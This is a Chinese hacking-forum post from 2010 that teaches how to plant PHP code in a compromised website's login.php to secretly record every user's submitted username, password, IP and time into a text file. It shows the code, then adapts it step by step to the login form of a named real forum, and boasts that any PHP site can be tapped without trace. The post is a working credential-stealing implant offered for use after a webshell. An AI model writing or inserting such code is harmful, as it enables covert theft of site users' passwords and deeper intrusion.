总版主
- 注册日期2010-11-25
- 发帖数385
- QQ593249217
- 火币969枚
- 粉丝282
- 关注1
|
阅读:5835回复:0
【原创】万能截取php后台登陆密码的代码
楼主#
更多
发布于:2010-11-26 17:52
 | |  |  | 拿到webshell之后,想要进一步渗透,诸如discuz的密码,不是直接用md5加密的,破解难度很大。以前帮大头写过一次,昨天小猪大哥正好用到,就又写了一遍。代码比较简单,就几句话,我把原理说的详细点,照顾下对php不太了解有朋友。
QUOTE:
if($_POST["loginsubmit"]!=""){ //判断是否点了登陆按钮
$sb="user:".$_POST["username"]."--passwd:".$_POST["password"]."--ip:".$HTTP_SERVER_VARS["REMOTE_ADDR"]."--".date("Y-m-d H:i:s")."\r\n"; // 把POST接收到的值 连起来赋值给变量$sb 后面附加截取了IP和日期
fwrite(fopen("robot.txt","ab"),$sb);} //结果写入一个文件
下面简单分析一下,以华夏的登陆页面为例。打开bbs.77169.com/login.php 右键查看源码,CTRL+F搜索action找到登陆的表单。
我只复制了关键代码过来.
QUOTE:
<form action="login.php?" method="post" name="login" onSubmit="this.submit.disabled=true;"> //action后面的值即是表单提交的地址,里面会处理登陆,比如判断密码是不是正确什么的 method为POST,所以用$_POST接收。
。。。。强大的省略号。。。。。。
<TR>
<TD height=40>账号(<U>U</U>):<BR>
<INPUT
class=input id=pwuser accessKey=u size=16
name=pwuser> </TD></TR> //用户名的input输入框, 注意其name的值, 要和$_POST["username"] 这里面的对应, 所以要截取华夏的密码,需要改为 $_POST["pwuser"]
<TR>
<TD height=40>密 码(<U>P</U>):<BR><INPUT
class=input id=pwpwd accessKey=p
type=password size=16 name=pwpwd> </TD></TR> //用户名的input输入框, 注意其name的值, 要和$_POST["username"] 这里面的对应, 所以要截取华夏的密码,需要改为 $_POST["pwpwd"]
..................强大的省略号.........
<TD width=130><INPUT style="WIDTH: 84px; HEIGHT: 29px" type=submit value=登录 name=login></TD> //这是提交按钮,他的名字为login,值为“登陆”。
表单提交的值,可以用$_POST变量来接收,以二维数组的形式保存在$_POST变量里,可以用echo $_POST[inputname]读取其结果
所以呢 狗狗如果想截取大家的密码,就可以在login.php里面,加上下面这段代码
QUOTE:
if($_POST["login"]!=""){ $sb="user:".$_POST["pwuser"]."--passwd:".$_POST["pwpwd"]."--ip:".$HTTP_SERVER_VARS["REMOTE_ADDR"]."--".date("Y-m-d H:i:s")."\r\n";
fwrite(fopen("robot.txt","ab"),$sb);}
只要是php的程序,理论上都可以不留痕迹的截取到密码,保存到文本。大家自行修改 哈。
| |  | |  |
|
